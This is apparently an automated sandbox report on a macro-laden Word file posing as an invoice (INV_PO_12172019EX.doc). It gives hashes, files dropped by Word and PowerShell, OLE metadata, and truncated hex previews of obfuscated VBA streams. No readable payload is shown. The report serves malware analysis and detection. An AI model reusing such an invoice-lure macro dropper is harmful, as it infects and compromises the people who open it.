SSDEEP: | 1536:7DQgURfP3uLmO7PTpJNTMf+h2QM1n/+JDoOii/UNxFolBBEPqB4VLH:7KP3kmOf/NTMygn/+5/GMBUq0 |
MD5: | B6E732A65BDAD5D366D4C0F62C3CB9C5 |
SHA1: | F88A3FED47CF1AC9BB895FF79D464A3888529835 |
SHA-256: | D9DEDA2BF34AD45FA2FF76F132E63F3EB3AEA4F0F13DD12A60D5FD285A2B6EC1 |
SHA-512: | 600DD295089FAF0054129B0D61B1A2766AD85F1CED826290C13C00170955D7599A96C400BAACD3FA87292CE3E17C9C4A4DC638A0725CD2D48F25666DA53BD017 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1049 |
Entropy (8bit): | 4.546704366097275 |
Encrypted: | false |
SSDEEP: | 24:8GdMdk/XT89dqQlikIIK/retigkIIK5Dv3qEu7D:8O/XTkhizp6zaE0D |
MD5: | 6A947D3CBF076D416F2D48F2533139F1 |
SHA1: | 77E8B65317A9733473D9C03DB08ED956A4DCBDB0 |
SHA-256: | 5DA8224BC3329298673EDFAEAEE6C66CF25B084F0765D2EA739E0A3B114BE0B3 |
SHA-512: | 48877D4C028EFDC7BCC4E000C50FCE9A00FBB7A6F2233698BE4D2DF865097E8056B9D13069D6A526A0821F81CB7B206BBE790B103D101A6D0592CBB7440DE72B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 85 |
Entropy (8bit): | 4.883240648927214 |
Encrypted: | false |
SSDEEP: | 3:bDuMJl0eq8GgLFomX1Kz61q8GgLFov:bC2ggLFiz61ggLFy |
MD5: | 7AA28BB4ED2C12561AB9348E324D1F06 |
SHA1: | 75A42F9AFF6AA1B0831B449F7B659A9114DFB9AE |
SHA-256: | 832F210041FC9C8554018D869A63A8D9114C9A11DA3219238E266CB4D0A57CCA |
SHA-512: | 5F92ABA58A409ACB9F9D479899D9EF5F01CD6C7C4B4F7241A8168BB5EF95ABB54DE8978BD7587F545977E03CAEBA9CB81831996B17098EB8675A53EB373306AB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.503835550707525 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll |
MD5: | D9C8F93ADB8834E5883B5A8AAAC0D8D9 |
SHA1: | 23684CCAA587C442181A92E722E15A685B2407B1 |
SHA-256: | 116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11 |
SHA-512: | 7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8016 |
Entropy (8bit): | 3.583147657409058 |
Encrypted: | false |
SSDEEP: | 96:chQCNAPXMqIqvsqvJCwoSz8hQCNAPXMqIqvsEHyqvJCworkzsKPrY1HFyuyrBKPW:cofRoSz8ofJHnorkzsKud+BKojp |
MD5: | 292F304870BE5532F0EF707A59FD2F19 |
SHA1: | FD7EF902B0E44F4E7187B34156CC61D56A25E7F8 |
SHA-256: | 2F7EE2660521FC2D367CE89E05FC58728EC17635DB254A51AF980DA54E9BFE46 |
SHA-512: | 57270A0CACF1929380EDCBF2691D2C521F0A9948ECE43C36090F7D2B08F1A2F102AB812AA31A04776BB59CB446B36CD7D852A4561A398CEBBAC4910AF2582DED |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LDV95WB5GH1Q7ECQYL9V.temp
Download File
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8016 |
Entropy (8bit): | 3.583147657409058 |
Encrypted: | false |
SSDEEP: | 96:chQCNAPXMqIqvsqvJCwoSz8hQCNAPXMqIqvsEHyqvJCworkzsKPrY1HFyuyrBKPW:cofRoSz8ofJHnorkzsKud+BKojp |
MD5: | 292F304870BE5532F0EF707A59FD2F19 |
SHA1: | FD7EF902B0E44F4E7187B34156CC61D56A25E7F8 |
SHA-256: | 2F7EE2660521FC2D367CE89E05FC58728EC17635DB254A51AF980DA54E9BFE46 |
SHA-512: | 57270A0CACF1929380EDCBF2691D2C521F0A9948ECE43C36090F7D2B08F1A2F102AB812AA31A04776BB59CB446B36CD7D852A4561A398CEBBAC4910AF2582DED |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.503835550707525 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll |
MD5: | D9C8F93ADB8834E5883B5A8AAAC0D8D9 |
SHA1: | 23684CCAA587C442181A92E722E15A685B2407B1 |
SHA-256: | 116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11 |
SHA-512: | 7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 6.586615503838857 |
TrID: |
|
File name: | INV_PO_12172019EX.doc |
File size: | 188839 |
MD5: | 3b7fa78ebf399bb0230590bfec589fa7 |
SHA1: | 199d4646fdbf9b5167d80ed71ce0ea406c40b018 |
SHA256: | 5c2dc72128d235ecdca49e4026ec782cdce9021c5b46ebf841000bab5ebcc129 |
SHA512: | c1936fad69a8231b5e39f8a757d469af2487c3f40944ce9b20094d2924510f6fff341ae7123cc179bd8419a68ed28ba4b0dd4c500b9d6cccd6339d23c8c480af |
SSDEEP: | 3072:752y/GdynktGDWLS0HZWD5w8K7Nk9uD7IBUOUasgt+PpkkrbfzHQfzZExXMHIwtN:752k43tGiL3HJk9uD7bOUasFPpkkrbfE |
TLSH: | CE04AE0435C1BD8BEF9612314BCBEFBA2218BC952D59D25B7249B73D6F304A0D992B21 |
File Content Preview: | ........................>.......................................................N.............................................................................................................................................................................. |
Icon Hash: | e4eea2aaa4b4b4a4 |
Document Type: | OLE |
Number of OLE Files: | 1 |
Has Summary Info: | |
Application Name: | Microsoft Office Word |
Encrypted Document: | False |
Contains Word Document Stream: | True |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | True |
Flash Objects Count: | 0 |
Contains VBA Macros: | True |
Code Page: | 1252 |
Title: | |
Subject: | |
Author: | |
Keywords: | |
Comments: | |
Template: | |
Last Saved By: | |
Revion Number: | 1 |
Total Edit Time: | 0 |
Create Time: | 2019-12-17 19:30:00 |
Last Saved Time: | 2019-12-17 19:30:00 |
Number of Pages: | 1 |
Number of Words: | 5 |
Number of Characters: | 34 |
Creating Application: | |
Security: | 0 |
Document Code Page: | 1252 |
Number of Lines: | 1 |
Number of Paragraphs: | 1 |
Thumbnail Scaling Desired: | False |
Company: | |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 1048576 |
General | |
Stream Path: | Macros/VBA/Bnzailenjg |
VBA File Name: | Bnzailenjg.bas |
Stream Size: | 10499 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . Q . Q . . . . . . . . . . ~ . . . |
Data Raw: | 01 16 01 00 01 f0 00 00 00 ac 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff b3 02 00 00 af 1c 00 00 00 00 00 00 01 00 00 00 39 9e e5 de 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
|
General | |
Stream Path: | Macros/VBA/Fbkxcpydi |
VBA File Name: | Fbkxcpydi.frm |
Stream Size: | 1168 |
Data ASCII: | . . . . . . . . H . . . . . . L . . . O . . . . . . . . . . . . . . 9 Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . ( . . . . . S P . . . . S . . . . . S . . . . . S . . . . . . . . . . . . 0 . { . 6 . 1 . 6 . 0 . 8 . F . F . 3 . - . A |
Data Raw: | 01 16 01 00 01 f0 00 00 00 48 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 4f 03 00 00 a3 03 00 00 00 00 00 00 01 00 00 00 39 9e 94 5a 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
|
General | |
Stream Path: | Macros/VBA/Vidpgeil |
VBA File Name: | Vidpgeil.cls |
Stream Size: | 3353 |
Data ASCII: | . . . . . % . . . . . . . . . . 7 . . . " . . . < . . . . . . . . . . . . . . 9 . . . . . . . . . . . . . . . . . . . D . . . z . Z F . . x . J . 2 X E ; . < . h . . . . . . . . . . . . . . . . . . . . . + + . O 3 J < . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . ! . L x i j u p n g v , 0 , 0 , M S F o r m s , T e x t B o x . + + . O 3 J < . . z . Z F . . x . . . . M E . . . . . . . . . . . . . . . . . . . . . . . P . . . . . S " . . . . S . . . . . S " . . . . s . . . . . 6 " . . |
Data Raw: | 01 16 01 00 06 25 01 00 00 db 03 00 00 09 01 00 00 37 02 00 00 22 04 00 00 3c 04 00 00 b8 09 00 00 01 00 00 00 01 00 00 00 39 9e da f0 00 00 ff ff e3 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 44 00 ff ff 00 00 7a ba d8 fb c3 16 5a 46 b3 f4 04 94 0b c9 78 ec 0f 4a 83 11 32 58 fa 45 92 3b d9 ac 3c 1b 68 18 00 00 00 00 00 00 00 00 00 00 00 00 00 |
|
General | |
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 280 |
Entropy: | 2.3907762904521577 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . . |
Data Raw: | fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00 |
General | |
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 424 |
Entropy: | 3.311907066926082 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . x . . . . . . . . . . . . . . . . . . d . . . . . . . . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | fe ff 00 00 06 01 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 78 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 64 01 00 00 03 00 00 00 98 00 00 00 04 00 00 00 4c 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 d0 00 00 00 09 00 00 00 dc 00 00 00 |
General | |
Stream Path: | 1Table |
File Type: | ARC archive data, crunched |
Stream Size: | 7024 |
Entropy: | 5.881578643954767 |
Base64 Encoded: | True |
Data ASCII: | . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 |
Data Raw: | 1a 06 0f 00 12 00 01 00 78 01 0f 00 07 00 03 00 00 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 |
General | |
Stream Path: | Data |
File Type: | dBase III DBT, version number 0, next free block index 552, 1st item "\213<\233\374\024\277\371\333\272\217\335\274\277\235~\017\266\213\336\347{\235O+LJC;c^E\325\376\003p\006\010p>\257\034\375\001" |
Stream Size: | 130884 |
Entropy: | 7.02914979392898 |
Base64 Encoded: | True |
Data ASCII: | ( . . . D . d . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . s . . F . . . . . . . . A . . . . ? . . . . . . . . . . . . . . . ? . . . . . . . . . F . y . t . y . h . w . g . a . y . v . z . w . u . . . 3 . " . . . . . . . ` . . . . . ? . . . . . . . . . . . . . . . 2 . . P . . . . . . 7 . a t { 7 . 6 r ; . , . . . . . . . D . . . . . . ` ! . $ . . . . 7 . a t { 7 . 6 r ; . . . . . . . . . . . . . |
Data Raw: | 28 02 00 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 0f 00 e8 03 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 84 00 00 00 b2 04 0a f0 08 00 00 00 06 04 00 00 00 0a 00 00 73 00 0b f0 46 00 00 00 7f 00 80 00 80 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 0c 00 1f 00 ff 01 00 00 |
General | |
Stream Path: | Macros/Fbkxcpydi/\x1CompObj |
File Type: | data |
Stream Size: | 97 |
Entropy: | 3.6106491830605214 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . 9 q . . . . . . . . . . . . |
Data Raw: | 01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00 |
General | |
Stream Path: | Macros/Fbkxcpydi/\x3VBFrame |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 293 |
Entropy: | 4.65317603063951 |
Base64 Encoded: | True |
Data ASCII: | V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } F b k x c p y d i . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 3 0 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 5 0 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w |
Data Raw: | 56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 46 62 6b 78 63 70 79 64 69 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20 |
General | |
Stream Path: | Macros/Fbkxcpydi/f |
File Type: | data |
Stream Size: | 682 |
Entropy: | 4.132154186006995 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . H . . . . . . . . T . . . , . ( . . . . . . . Y W M . z . F l . z . J d ? 6 . . . . . 0 . . . . . . . . , . . . . . . . . . . . D . . . . . . . V m m y u t u w y y m x e . . . . . . . . . . . . . ( . . . . . . . . . . . H . . . . . . . M z o n z s z c k d d x . . . . . . . . . . , . . . . . . . . . . . D . . . . . . . L u g n n j b j c s y t q . . . . . . . . . . . . . ( . . . . . . . . . . . @ . . . . . . . C e j f e h s i q d p |
Data Raw: | 00 04 20 00 08 0c 00 0c 0c 00 00 00 18 00 00 00 00 7d 00 00 6b 1f 00 00 e1 14 00 00 00 00 00 00 00 00 00 00 01 00 00 00 48 00 bb 1f 00 00 02 00 00 00 54 00 00 00 2c 01 28 01 03 00 98 00 9c 00 08 00 f5 59 ca e5 c4 57 d8 4d 9b d6 1d ee ed d2 7a f4 97 b7 b0 e3 2e a7 db 46 a0 d7 6c 9e ba 8e 9b bc 19 7a 12 f2 fb fb ed 4a 84 64 3f 36 d7 8c fe fb 0c 00 00 00 30 02 00 00 00 8c 01 00 00 00 |
General | |
Stream Path: | Macros/Fbkxcpydi/o |
File Type: | data |
Stream Size: | 5365 |
Entropy: | 3.5962878587320564 |
Base64 Encoded: | False |
Data ASCII: | . . $ . . . @ . . . . . H , . . . . . . { . . . F g f x n a f l o k y j . . . . 5 . . . . . . . . . . . . . T a h o m a . . . . ( . . . @ . . . . . H , . . . . . . { . . . P a x n v j g g l l g f w . . . . . . . 5 . . . . . . . . . . . . . T a h o m a . . . . $ . . . @ . . . . . H , . . . . . . { . . . O i i c t q z y e n m f . . . . 5 . . . . . . . . . . . . . T a h o m a . . . . . . . @ . . . . . H , . . . . . . { . . . o w e r s h e . . . . . 5 . . . . . . . . . . . . . T a h o m a e . . . . . . @ . |
Data Raw: | 00 02 24 00 01 01 40 80 00 00 00 00 1b 48 80 2c 0c 00 00 80 ec 09 00 00 7b 02 00 00 46 67 66 78 6e 61 66 6c 6f 6b 79 6a 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 00 02 00 00 54 61 68 6f 6d 61 00 00 00 02 28 00 01 01 40 80 00 00 00 00 1b 48 80 2c 0d 00 00 80 ec 09 00 00 7b 02 00 00 50 61 78 6e 76 6a 67 67 6c 6c 67 66 77 00 00 00 00 02 18 00 35 00 00 00 06 00 00 80 a5 00 00 00 |
General | |
Stream Path: | Macros/PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 616 |
Entropy: | 5.308939685529123 |
Base64 Encoded: | True |
Data ASCII: | I D = " { 3 2 C 0 4 0 1 F - 9 3 B D - 4 2 8 C - 9 E D 1 - C 1 8 5 E 1 7 F A D 7 D } " . . D o c u m e n t = V i d p g e i l / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = F b k x c p y d i . . M o d u l e = B n z a i l e n j g . . E x e N a m e 3 2 = " U f r d r m z p " . . N a m e = " P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G |
Data Raw: | 49 44 3d 22 7b 33 32 43 30 34 30 31 46 2d 39 33 42 44 2d 34 32 38 43 2d 39 45 44 31 2d 43 31 38 35 45 31 37 46 41 44 37 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 56 69 64 70 67 65 69 6c 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d 0a 42 61 73 65 43 |
General | |
Stream Path: | Macros/PROJECTlk |
File Type: | Windows Precompiled iNF, version 0.1, InfStyle 1, flags 0x59f50000, at 0xf47a |
Stream Size: | 30 |
Entropy: | 3.40623892865339 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . Y W M . z . . . . . . . . |
Data Raw: | 01 00 01 00 00 00 f5 59 ca e5 c4 57 d8 4d 9b d6 1d ee ed d2 7a f4 00 00 00 00 00 00 00 00 |
General | |
Stream Path: | Macros/VBA/_VBA_PROJECT |
File Type: | data |
Stream Size: | 10638 |
Entropy: | 5.338094292911443 |
Base64 Encoded: | False |
Data ASCII: | a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 . . . D . |
Data Raw: | cc 61 af 00 00 01 00 ff 09 04 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 07 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00 |
General | |
Stream Path: | Macros/VBA/__SRP_0 |
File Type: | data |
Stream Size: | 1975 |
Entropy: | 4.623946704589897 |
Base64 Encoded: | False |
Data ASCII: | K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ . . . ~ d . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . . . . . . . . ! N < c L . . . . . . . . . . . . . . . . . . . . . e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 93 4b 2a af 01 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 80 01 00 00 80 00 00 00 80 00 00 00 80 00 00 00 04 00 00 7e 05 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 7e 01 00 00 |
General | |
Stream Path: | Macros/VBA/__SRP_1 |
File Type: | data |
Stream Size: | 191 |
Entropy: | 2.6043883713669818 |
Base64 Encoded: | False |
Data ASCII: | r U . . . . . . . . . . . . . . . ~ . . . ~ . . . ~ y . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . ! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . L x i j u p n g v . . . . ! . . . . . . . . . . . . . . ( . . . . . . . d . . . . . . . |
Data Raw: | 72 55 80 00 00 00 80 00 00 00 80 00 00 00 80 00 00 00 01 00 00 7e 01 00 00 7e 01 00 00 7e 79 00 00 7f 00 00 00 00 0a 00 00 00 09 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 09 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 03 00 00 09 31 03 00 00 00 00 00 00 f9 09 00 00 00 00 00 00 08 00 00 00 00 00 01 00 03 00 00 09 21 07 00 00 00 00 00 00 89 0a 00 00 00 00 |
General | |
Stream Path: | Macros/VBA/__SRP_2 |
File Type: | data |
Stream Size: | 440 |
Entropy: | 2.3806145775909835 |
Base64 Encoded: | False |
Data ASCII: | r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Y . . . . . . . . . . . 4 . . . . . . . . . . a . . . . . . . ! . . . . . . . . . . . . . . . . ` . . . . . . . . . . . < . . . A . . . . . . . . . . . . . . i . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . E . . . . . . . y . . . . . . . . . . . . . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 1e 00 00 00 09 00 00 00 00 00 00 00 09 00 00 00 00 00 03 00 30 00 00 00 00 00 00 00 01 00 01 00 00 00 00 00 01 00 01 00 00 00 02 00 81 09 00 00 00 00 00 00 a9 09 00 00 00 00 00 00 d1 09 00 00 00 00 00 00 09 00 00 00 01 00 02 00 59 09 00 00 00 00 00 00 08 00 0d 00 34 00 00 00 f9 09 00 00 00 00 00 00 61 00 00 00 00 00 |
General | |
Stream Path: | Macros/VBA/__SRP_3 |
File Type: | data |
Stream Size: | 142 |
Entropy: | 2.3857723234419117 |
Base64 Encoded: | False |
Data ASCII: | r U . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . H . . . . . $ . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . 8 . . . . . . . n . . . . . . . |
Data Raw: | 72 55 80 00 00 00 00 00 00 00 80 00 00 00 80 00 00 00 00 00 00 00 10 00 00 00 09 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff 00 00 00 00 48 00 00 00 04 00 24 00 b9 01 00 00 00 00 02 00 00 00 04 60 00 00 10 07 1c 00 ff ff ff ff ff ff ff ff 00 00 00 00 00 00 00 00 1e 01 00 20 00 a1 00 00 00 00 00 01 00 ff ff ff ff 00 00 00 00 00 00 04 40 02 00 04 07 1d c1 00 00 00 00 00 01 00 38 00 |
General | |
Stream Path: | Macros/VBA/dir |
File Type: | data |
Stream Size: | 1100 |
Entropy: | 6.588091810909644 |
Base64 Encoded: | True |
